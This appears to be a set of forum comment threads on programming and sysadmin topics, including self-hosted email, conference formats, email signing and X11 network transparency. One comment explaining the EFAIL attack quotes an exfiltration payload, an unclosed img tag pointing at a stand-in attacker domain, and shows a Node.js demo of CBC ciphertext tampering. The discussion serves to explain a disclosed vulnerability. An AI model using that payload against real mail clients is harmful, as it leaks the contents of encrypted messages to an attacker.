1. 1

    The work-around I found is console.log("x: " + JSON.stringify(x));

    1. 1

      If you need to explicitly convert the object to a string like this, the output will be easier to read if you pretty-print it. You can do this by passing JSON.stringify a value such as 2 or '\t' for its third argument, space:

      console.log("x: " + JSON.stringify(x, null, 2));
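
      For example, with a hypothetical object (`x` here just stands in for whatever you're logging):

      ```javascript
      // x is an illustrative object standing in for whatever you're logging
      const x = { name: "example", tags: ["a", "b"] };

      // Third argument ("space"): number of spaces per nesting level,
      // or a string such as "\t" to indent with tabs instead.
      console.log("x: " + JSON.stringify(x, null, 2));
      // x: {
      //   "name": "example",
      //   "tags": [
      //     "a",
      //     "b"
      //   ]
      // }
      ```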
      
    1. 3

      I always use xeyes(1) for testing X-forwarding. It’s cuter. Using it as an alarm never occurred to me, simple and good idea.

      1. 19

        Half a GB of memory is tight for a mail-server now? Postfix is terribly confusing? Running your own mail-server is probably a terrible idea?

        Boy, I am getting old.

        I used to run sendmail on a machine at home with <8 MB of RAM, and I didn’t have an internet connection, so I stored the emails on a floppy disk, which I took by bike to the university to send them, and to fetch any new incoming emails.

        All the SPF, DKIM, DMARC, TLS certificates and spam-prevention is much more complicated these days, admittedly.

        Congratulations on getting it up and running, though.

        1. 6

          Half a GB of memory is tight for a mail-server now?

          …used to run sendmail on a machine at home with <8 MB of RAM

          I don’t think it’s fair to compare sendmail, which is extremely basic, to some of today’s mail server, uh, suites, with spam filtering, web UIs for config/maintenance (which some people like, I couldn’t care less), etc. Some even provide a webmail interface! I think you lose some system resources in the abstraction necessary to lower the bar for setting up and running these things. Not everyone has the patience/know-how/time to configure dozens of tools individually to accomplish all of this.

          Running your own mail-server is probably a terrible idea?

          Nowadays you’ll find your mails being rejected or silently stuffed into recipients’ “spam” folders by google because they don’t recognize your domain(1), and you’ll lose data (incoming mail) when your mail server goes down for (insert unforeseen reason here) and you are on vacation and cannot fix it. It’s not your grandpa’s email anymore.

          1. I still have this problem with my current mail provider mailbox.org, who has been providing email service since 2014. If google still cannot get the hint that they are legit, then there’s little hope for folks using custom domains.
          1. 7

            I’ve been running my own email server since 1998 (and with the current IP address for over a decade now) and I’ve never had an issue of it going down while on vacation. If you are that concerned (and you don’t check email at all on vacation) then spring for a back-up MX service (just be aware that spammers will target the backup MX in the hopes of slipping past spam detection).

            1. 5

              Google silently dropping messages from domains with DKIM/DMARC/etc. setup correctly is a problem of Google, and probably even an anti-competitive tactic. I don’t have that problem often, but when I do, it’s invariably Gmail that does it.

              As for data loss, correctly implemented SMTP servers must retry sending a message at increasing intervals, up to about a week. Most actually do. I haven’t seen Postfix crash in my life though, even in very busy setups, so I never got to verify how far it stretches in practice.

              1. 2

                Regarding resources: One has to bear in mind that it is a personal system. Spam filtering, web UI (does that mean webmail?), etc. would not be under heavy load. I think this is quite reasonable.

                Also regarding ending up in spam: I think that’s mostly a myth. Yes, it’s true if you send mail without SPF or DKIM, or without making sure your PTR is set correctly, etc. If you do that as a one-time setup, you’re fine.
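
                As a sketch of what that one-time setup amounts to on the DNS side (domain, selector, address and key are all hypothetical placeholders):

                ```dns
                ; SPF: only this address may send mail for example.org
                example.org.                 IN TXT "v=spf1 ip4:203.0.113.25 -all"
                ; DMARC: policy for failures, plus an address for aggregate reports
                _dmarc.example.org.          IN TXT "v=DMARC1; p=quarantine; rua=mailto:postmaster@example.org"
                ; DKIM: public key for the selector the MTA signs with
                mail._domainkey.example.org. IN TXT "v=DKIM1; k=rsa; p=<base64-public-key>"
                ```

                The PTR for 203.0.113.25 is set wherever the address is delegated and should resolve back to the mail server’s hostname.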

                Regarding the mail server going down: first of all, this is very, very rare. Rarer than with many other protocols, simply because it’s old, and unless you constantly change stuff you will end up with something stable fairly quickly. This is, by the way, a reason why you might not want to use “new” stuff like Docker.

                Other than that, emails don’t usually get lost, except for storage reasons. Again, unlike with other protocols, delivery is retried and mails might be returned.

                I think one has to differentiate between personal email and running a small mail provider, sending out newsletters, etc. Sending the same email to many gmail recipients for example is a lot more likely to trigger something than an individual mail. Also if emails do in fact get rejected you will learn about this. So if you want to be absolutely secure, have a fallback.

                While it’s of course a service and not exactly zero maintenance, email tends to be by far the easiest thing to maintain once initially set up. That’s given you don’t try to be super smart, and that you have a basic understanding of what you are doing. If you are using your OS for the first time, the story is different, of course.

              2. 3

                Boy, I am getting old.

                Either that, or I’m just new. :)
                Thanks anyway!

              1. 12

                This conference is “virtual”, so it won’t influence your travel(/CO₂)-budget 👍

                1. 2

                  Actually this disappointed me a bit; “real” presentations tend to be easier to follow, and conversations/questions are more natural too.

                  But I get the CO2 point. If I had to fly to get there, I wouldn’t go either way.

                  1. 3

                    Yeah, but putting together a physical conference is a lot of work¹, and the audience might be limited - so I tried to spin it as a positive thing :-)

                    ¹ It has been “real” before, though, unfortunately I wasn’t able to attend the one in London, and I don’t want to fly to the US.

                    1. 5

                      We need more of those. For a lot of people, any real world conference is completely out of reach.

                      1. 5

                        Both. We also need more local conferences, so that people who need to be close to people to be in touch don’t have to fly across the globe.

                        Seriously, I wish we’d go back from 1000-2000-person conferences to something like 100-150, where it is rather easy to find a room in any city across the globe.

                        Also, there are conference models that are easy to organise and can literally be set up in 2-3 days.

                        All that with experience, mind you, which is a good reason to not frustrate our community organisers and make sure they run another one after trying it out once.

                        1. 1

                          I’d like to hear about those models.

                          1. 4

                            This is kind of how we ran Fennel Conf: https://conf.fennel-lang.org/2019

                            It was very low-key with a small conference-room full of attendees in person and 4-6 folks who joined our Jitsi stream as we went.

                            1. 2

                              Yeah, stuff like that. There’s tons of value in not overworking yourselves in running a large conf. I see a lot of good in raising the organisational quality of FOSS community conferences, but we need to constantly remind people that all this isn’t always necessary.

                            2. 4

                              First of all: get an easy venue. For small conferences, a contact to a professor at a university is nice, or a friendly company in town that has an event room of that size. Get no catering, just drinks. If you do want catering, ask around the organiser scene in your location for a recommendation and pick that. Nothing mindblowing, just good food. You may want vegan, vegetarian and all the options: caterers are professionals, just ask for that.

                              Volunteer organisers are well-connected and very willing to give out help of that kind. They were all beginners once and want to spare others that harm.

                              Format: don’t do speaker management. That is the biggest time-sink. There are models that don’t need it!

                              • Unconferences: everyone brings their session suggestions, but the selection happens on site. Needs a location with multiple rooms.
                              • Spontaneous conferences: kind of similar to the above, but you have just one room, and people can suggest talks beforehand on a wiki or GitHub or so.

                              You can take that to the extreme, e.g. lightning.io was a conference that only had lightning talks and every attendee needed to talk.

                              The point is that you want strategies that organise on the day.

                              Ticket sales: Stripe and ti.to are the low-friction options. Especially ti.to: it’s completely geared towards events like this. The biggest problem here is where the money goes. Setting up a company/non-profit/bank account is easily the biggest part of this. Finding someone at your location to take you into their books is the best option. Again, get in touch with other organisers.

                            3. 1

                              150?! I find 5 or 6 people to be great for a conference.

                              1. 1

                                I’d call that a small meeting?

                                25 is definitely a feasible thing for a conference though. I don’t want to be judgemental there. I picked 100-150 because it is an easy number to reach even for fringe subjects, without advertising, in places like Berlin.

                                1. 1

                                  Conference is just a fancy word for “meeting” :)

                                  I personally get a lot more out of smaller group meetings. When it’s someone giving a talk to a larger audience, even 20 people, I have a harder time paying attention and I feel more shy about asking questions. Maybe that’s just me?

                                  Of course having more people in a room is more efficient for conveying information, provided they are paying attention and understanding what is said.

                                  1. 1

                                    Conference is just a fancy word for “meeting” :)

                                    Yes, and indeed, it is one of those words with a 1000 meanings. In the context we’re talking about, conferences are usually larger endeavours. If I say “I tend to run conferences”, no one assumes I do 20 person things.

                                    I personally get a lot more out of smaller group meetings. When it’s someone giving a talk to a larger audience, even 20 people, I have a harder time paying attention and I feel more shy about asking questions. Maybe that’s just me?

                                    Probably, but that’s fine. I’ve been running many events of all sizes and in different styles, and all have their advantages for certain people. That’s why I’m such a huge proponent of having more events. (Some people think that there should be fewer events nowadays.)

                                    E.g. the first larger event I ran (eurucamp) consciously reduced talk time in favour of a very long lunch break (5 hours), where people could just hang around and chat at a Berlin lake in summer. It’s a common problem that organisers mistake “program” for “the useful time” for attendees. People loved it, and came back specifically for that, yet some wanted a more classic schedule at a more easily reachable place and didn’t come the next year.

                                    If rigorous learning of a subject is what you want, something over 6 people is probably indeed not the right thing. Conferences above 50 people mainly use the talks as inspirations for things to later chat about.

                    1. 3

                      I seem to have an affinity for implementing nntp interfaces to things. My latest unfinished project is a blog engine using nntp to control it (posts and comments). Finished projects include an Atom/RSS feed reader with an nntp interface.

                      Gnus will do that to you. Well, me, anyway.

                      1. 9

                        Why would you not make curl/libcurl Free/Open Source Software? Why would you want to not share the joy, burden and benefits with the world?

                        How much would the author have gained from making it proprietary, limiting its use (and usefulness) and restricting other people from contributing, compared to what he actually got?

                        I think Stenberg’s reply on StackOverflow answers most of these questions - the interesting part is that the person posing the question sees it from such a different angle compared to the creator.

                        How can we improve the communication so the logic and dynamics of Free/Open Source Software becomes more obvious and well-known?

                        1. 19

                          Well, by not releasing it freely, you get a lot less hate mail from people claiming you’ve hacked their car and they’re going to call the police, etc.

                          1. 3

                            Why would you not make curl/libcurl Free/Open Source Software? Why would you want to not share the joy, burden and benefits with the world?

                            You can share the joy with the world by making it free for non-commercial use but cheap and shared source for commercial use. Scaled from tiny amount for micro-businesses to larger amount for larger companies. Then, folks can enjoy it, fix it, and send potential improvements. The money from commercial use gets developers paid to improve that product and make more. The extras might be [F]OSS. Sciter’s price/access scaling is one of my favorite examples of how that might play out.

                            By not charging and using an open license, the value moved into the businesses who used it for a lot of other things. Most of those probably weren’t awesome. Some might even have been harmful to software developers. It did increase the uptake by selfish, commercial parties. There were also contributions that might not have happened under a non-open license. The author loves both benefits. So, the author made a good choice for their preferences.

                            1. 1

                              Wonder what sciter is. I looked on the site and it is not clear.

                              1. 1

                                Know the web-like UIs in programs like antivirus products going way back? They often use Sciter to do that. It’s like Electron before Electron, with minimal resource use. The first answer in this link gives both more information and an example of how small the portable apps can be.

                          1. 6

                            Is there an easy way to get a list of what images may have been affected?

                            1. 1

                              I second this, as it would allow many of us to at least be wary of any builds using base images which might have been affected. More transparency on this issue would have a great security impact, at least in my case.

                            1. 1

                              I use a text file, ~/.worklog, that I keep in “Debian Changelog format”. If you use Emacs there is a debian-changelog-mode that helps, if not there is a command-line program, dch, to help with the formatting.

                              It’s very simple: just a slight step above a free-format text file, in reverse chronological order.
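
                              For illustration, an entry in that format might look like this (names and dates invented; dch generates the boilerplate lines):

                              ```
                              worklog (2019.06.14) local; urgency=low

                                * Fixed the backup cron job; PATH was missing from the crontab.
                                * Upgraded Dovecot; checked that IMAP logins still work.

                               -- Jane Doe <jane@example.org>  Fri, 14 Jun 2019 16:02:03 +0200
                              ```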

                              And if you want it version controlled, that’s easy (using git or any other version control system you like), and it is both searchable (grep, ag or whatever your preference is) and since it is a text file, it is diff’able out of the box.

                              Works well for me; I keep it open in a separate window and update it continuously - very low friction.

                              1. 17

                                The problem is we have two bad solutions, bad for different reasons. Neither of them works transparently for the user.

                                GnuPG was built by nerds who thought you could explain the Web of Trust to a normal human being. S/MIME was built to create a business model for CAs. You have to get a cert from somewhere and pay for it. (Also for encryption S/MIME is just broken, but we’re talking signatures here, so…) And yeah, I know there are options to get one for free, but the issue is, it’s not automated.

                                Some people here compare it to HTTPS. There’s just no tech like HTTPS for email. HTTPS from the user side works completely transparently and for the web admin it’s getting much easier with ACME and Let’s Encrypt.

                                1. 7

                                  We don’t need WoT here though. WoT exists so you can send me a signed/encrypted email. Nice, but that’s not what’s needed here.

                                  1. 3

                                    Of course you need some measure of trust, like a WoT or CA, because how else are you going to verify that the sender is legitimate? Without that you can only really do xkcd authentication.

                                    1. 5

                                      Yes, you need some way to determine what you trust; but WoT states that if you trust Alice and I trust you, then I also trust Alice, and then eventually this web will be large enough I’ll be able to verify emails from everyone.

                                      But that’s not the goal here; I just want to verify a bunch of organisations I communicate with; like, say, my government.

                                      I think that maybe we’ve been too distracted with building a generic solution here.

                                      Also see my reply to your other post for some possible alternatives: https://lobste.rs/s/1cxqho/why_is_no_one_signing_their_emails#c_mllanb

                                      1. 1

                                        Trust On First Use goes a long way, especially when you have encryption (all its faults notwithstanding) and the communication is bidirectional, as the recipient will notice that something is off if you use the wrong key to encrypt for them.

                                    2. 1

                                      Also for encryption S/MIME is just broken

                                      It is? How?

                                      1. 2

                                        The vulnerability published last year was dubbed EFAIL.

                                        1. 1

                                          Gotcha. Interesting read. I’ll summarize for anyone who doesn’t want to read the paper.

                                          The attack on S/MIME is a known-plaintext attack that guesses (almost always correctly) that the encrypted message starts with “Content-type: multipart/signed”. You can then derive the initial parameters of the CBC encryption mode and prepend valid encrypted data that will chain properly into the remainder of the message.

                                          To exfiltrate the message contents you prepend HTML that will send the contents of the message to a remote server, like an <img> tag with src="http://example-attacker-domain.com/ without a closing quote. When the email client loads images, it sends a request to the attacking server containing the fully decrypted contents of the message.

                                          S/MIME relies on the enclosed signature for authenticity AND integrity, rather than using an authenticated encryption scheme that guarantees the integrity of the encrypted message before decryption. Email clients show you the signature is invalid when you open the message, but still render the altered HTML. To stop this attack clients must refuse to render messages with invalid signatures, with no option for user override. According to their tests, no clients do this. The only existing email clients immune to the attack seem to be those that don’t know how to render HTML in the first place.

                                          The GPG attack is similar. Unlike S/MIME, GPG includes a modification detection code (MDC). The attack on GPG thus relies on a buggy client ignoring errors validating the MDC, like accepting messages with the MDC stripped out, or even accepting messages with an incorrect MDC. A shocking 10 out of 28 clients tested had an exploitable form of this bug, including the popular Enigmail plugin.
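
                                          The CBC malleability this attack builds on can be sketched with Node’s built-in crypto. This is a toy single-block demo of the underlying property, not EFAIL itself; the key, IV and strings are invented:

                                          ```javascript
                                          // CBC malleability: an attacker who knows plaintext block i can XOR the
                                          // preceding ciphertext block (here: the IV) to make block i decrypt to
                                          // any chosen value -- the cipher itself raises no integrity error.
                                          const crypto = require('crypto');

                                          const key = crypto.randomBytes(16);
                                          const iv = crypto.randomBytes(16);
                                          const known = Buffer.from('Content-type: mu');   // 16 bytes, guessed header
                                          const desired = Buffer.from('<img src="http:/'); // 16 bytes, attacker's HTML

                                          const cipher = crypto.createCipheriv('aes-128-cbc', key, iv);
                                          cipher.setAutoPadding(false); // exactly one block, no padding
                                          const ct = Buffer.concat([cipher.update(known), cipher.final()]);

                                          // forgedIv = iv XOR known XOR desired
                                          const forgedIv = Buffer.alloc(16);
                                          for (let i = 0; i < 16; i++) forgedIv[i] = iv[i] ^ known[i] ^ desired[i];

                                          const decipher = crypto.createDecipheriv('aes-128-cbc', key, forgedIv);
                                          decipher.setAutoPadding(false);
                                          const pt = Buffer.concat([decipher.update(ct), decipher.final()]);
                                          console.log(pt.toString()); // <img src="http:/
                                          ```

                                          The fix is exactly what the summary above says: treat a failed signature or MDC as fatal instead of rendering the tampered HTML.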

                                    1. 5

                                      I like the name “Perl”, because it can be pronounced in (at least) two ways, and a Perl slogan was “There is more than one way to do it”.

                                      It also has an irreverent backronym expansion, if you want.

                                      I also like “Miranda”, because it sounds friendly.

                                      1. 4

                                        In which way can Perl be pronounced other than “pearl”?

                                        1. 2

                                          “Peril” /s

                                          1. 1

                                            Straight, with ‘e’ instead of ‘ae’-sound - as in [I am not a native English speaker] … well, sort of like if you take the sound by clicking on UK here https://dictionary.cambridge.org/pronunciation/english/pair and add an L to the end. Almost rhymes with the fruit pear.

                                            1. 1

                                              I’m guessing “peerl”, although I’ve never heard anyone using this pronunciation. It also sounds funny to my Italian ears, as “pirla” (pronounced “peer-la”) means “silly person” in Lombard dialect.

                                          1. 14

                                            Lastly, changes can easily be slowed down significantly by holdouts who refuse to collaborate.

                                            He’s not wrong, but he is comparing his experiences with Debian with his experiences in a commercial enterprise (and a report of experiences at Google, another commercial enterprise). In a commercial setting, everybody cooperates or else they get fired, and the company hires somebody else to replace them. In a volunteer project like Debian, it’s a lot harder to get people on-board - they signed up for some particular level of involvement and autonomy, and trying to change the deal afterwards in either direction is going to make people angry and leave. And in a volunteer project, you can’t just hire somebody else, you have to wait for somebody else to show up. If your project has a reputation for changing the social contract, you might be waiting a very long time…

                                            1. 12

                                              I accept your point, but the author pointed out that Debian can sometimes fail to take a decision for a long time, which can cause volunteers to leave, like the author himself. I believe it is good to have some sort of steering committee so that decisions can be taken when an issue arises, instead of it turning into a long battle.

                                              1. 11

                                                In a commercial setting, everybody cooperates or else they get fired

                                                It is very much possible to not cooperate in a company. It can be more or less hidden, but it happens all the time.

                                              1. 1

                                                If you do want a simple metric, this could be one: How often do you make the same mistake twice, rather than finding a way to minimize the chance of it happening again?

                                                1. 2

                                                  Another interesting one. I wonder how common it is for a programmer to make the same mistake many times. I have done this a handful of times, but it’s usually because the mistake is uncommon enough that I forgot having made it years ago.

                                                  1. 1

                                                    I have been cleaning up infinite loops left by a colleague in many a place, so some mistakes seem to be more like… habits.

                                                    I sure have also been cursing at myself for repeating mistakes, and then I tell myself to take the time to make a unit/regression test, so at least the test will tell me, rather than the users of the system.

                                                    One user gives quite frank feedback, to the tune of: “Didn’t you fix this before? How come it is broken again?” Which is both scalding and - maybe - also kind of fair enough.

                                                1. 3

                                                  I would like to see this but just as a tiny PC and hardware input device all in one. So you just hook up the USB (type C for display) to your laptop or a TV and you are away.

                                                  It would be like one of those stick PCs, except with an input device built in!

                                                  1. 2

                                                    I always thought it’d be cool to have something like the kinesis advantage pro (which I have) with a little folding LCD in the middle, a computer inside, and a thumbstick or two somewhere. Plus a bunch of ports for connecting it to stuff.

                                                    Perhaps with a battery inside.. :-)

                                                    Now just add a head-mounted display and you have a perfect travel computer.

                                                    Oh wait, did I just reinvent the laptop?

                                                    1. 2
                                                  1. 4

                                                    I’ve been using a home server (just a fanless power supply, a motherboard and an SSD lying on a shelf) running Debian stable, for a decade or so.

                                                    Works great for smtp (Postfix, OpenDMARC, OpenDKIM, SQLgrey), imap/pop (Dovecot), web (Apache, Catalyst, Spock, Hatta), dns (BIND), database (PostgreSQL), monitoring a camera (motion), weather station (weeWX, rtl_433), XMPP (ejabberd), CalDAV/CardDAV (Radicale), irc-proxy (BIP), ntpd, nntp-RSS/Atom gateway (homebrew).

                                                    1. 3

                                                      If you are having problems accessing the article in Google Groups, you can find it on olduse.net here: https://article.olduse.net/4737%40ethz.UUCP

                                                      1. 1

                                                        There is also an elisp package with HDFS support for TRAMP in Emacs: https://github.com/raghavgautam/tramp-hdfs - it supports Kerberos.

                                                        1. 2

                                                          I implemented my own simple OpenID-provider (in 252 lines including HTML, using the Perl OpenID-libraries), and was very happy with it and its UI. Too bad even Stack Overflow abandoned OpenID.

                                                          1. 2

                                                            It is very confusing that the Go language conference is called GopherCon - I mistake it for a conference on the gopher protocol, every time I see the name.

                                                            1. 1

                                                              I kind of think it’s their nefarious plan to wipe out the gopher protocol. The people behind the Go language must know the Gopher internet protocol, so picking the name “Gopher” must be intentional. Perhaps Google never liked gopher. Or gopher could potentially hurt their business?

                                                              1. 1

                                                                I’d like to believe that the “cute” gopher mascot was a playful thing that took off and with which people identified, anthropomorphism is surprisingly successful for adoption.

                                                                1. 1

                                                                  “Never attribute to malice what can adequately be explained by incompetence” :-) - in this case it is probably more a case of not thinking that gopher, the protocol, has much widespread use/“mindshare”, I’d say. Which arguably is correct, albeit ignoring history a little [too] much.

                                                              1. 2

                                                                TL;DR: as long as:

                                                                • The mailinglist doesn’t change Subject and Body of the emails
                                                                • Senders from domains with DMARC also have DKIM

                                                                Seems reasonable - as the article argues that the reasons for modifying Subject and Body are solved by List-Id: and List-Unsubscribe: headers, and SPF+DKIM+DMARC is not that burdensome to set up.
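
                                                                For reference, the two headers the article leans on look like this (list name and domain invented):

                                                                ```
                                                                List-Id: Example discussion list <example-list.lists.example.org>
                                                                List-Unsubscribe: <mailto:example-list-request@lists.example.org?subject=unsubscribe>,
                                                                 <https://lists.example.org/unsubscribe/example-list>
                                                                ```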

                                                                1. 4

                                                                  Obviously, if we intend to make Wayland a replacement for X, we need to duplicate this functionality.

                                                                  Perhaps a less than popular opinion, but: No, you don’t. If you want to replace A with B, you don’t need to replicate every mistake A made. Then B wouldn’t be much else than A’, with old bugs and new.

                                                                  Don’t get me wrong, X’s network transparency might have been useful at some point - it isn’t now.

                                                                  1. 8

                                                                    Practice speaks otherwise, many people use it daily.

                                                                    1. 1

                                                                      That a lot of people use something daily doesn’t mean it is good, or needs to be replicated exactly. Running GUI programs remotely, and displaying them locally IS useful. It does not require network transparency, though.

                                                                      1. 1

                                                                        Require? Perhaps not. It makes things easier in some ways, though.

                                                                    2. 6

                                                                      X’s network transparency might have been useful at some point - it isn’t now.

                                                                      I use it 5+ days a week - it is still highly useful to me.

                                                                      You’re right that fewer and fewer people know about it and use it - e.g. GTK has had a bug for many years that makes it necessary to stop Emacs after having opened a window remotely over X, and it’s not getting fixed, probably because X over network is not fashionable any more, so it isn’t prioritized.

                                                                      1. 2

                                                                        What is the advantage of X remoting over VNC / Remote Desktop?

                                                                        I remember using it in the past and being confused that File -> Open wasn’t finding my local files, because it looks exactly like a local application.

                                                                        I also remember that there were some bandwidth performance reasons. I don’t know if that is still applicable if applications use more of OpenGL and behave more like frame-buffers.

                                                                        1. 7

                                                                          Functional window management? If I resize a window to half screen, I don’t want to see only half of some remote window.

                                                                          1. 2

                                                                            Over a fast enough network, there’s no visible or functional difference between a local and remote X client. They get managed by the same wm, share the same copy/paste buffers, inherit the same X settings, and so on. Network transparency means just that: there’s no difference between local and remote X servers.

                                                                            1. 1

                                                                              It is faster, and you get just the window(s) of the application you start, integrated seamlessly in your desktop. You don’t have to worry about the other machine having a reasonable window manager setup, a similar resolution etc. etc.

                                                                              In the old days people making browsers, e.g. Netscape, took care to make the application X networking friendly. That has changed, and using a browser over a VDSL connection is only useful in a pinch - but running something remote like (graphical) Emacs, I prefer to do over X.

                                                                          2. 1

                                                                            I’d like to see something in-between X and RDP. Window-awareness built-in, rather than assuming a single physical monitor, and window-size (and DPI) coming from the viewer would by themselves be a big start.

                                                                            Edit: Ideally, pairing this with a standard format for streaming compressed textures, transforms, and compositor commands could solve a lot of problems, including the recent issue where we’re running up against physical bandwidth limitations trying to push pixels to multiple hi-def displays.

                                                                            1. 2

                                                                              FWIW I agree with you. It also so happens that something is coming soon enough .. https://github.com/letoram/arcan/wiki/Networking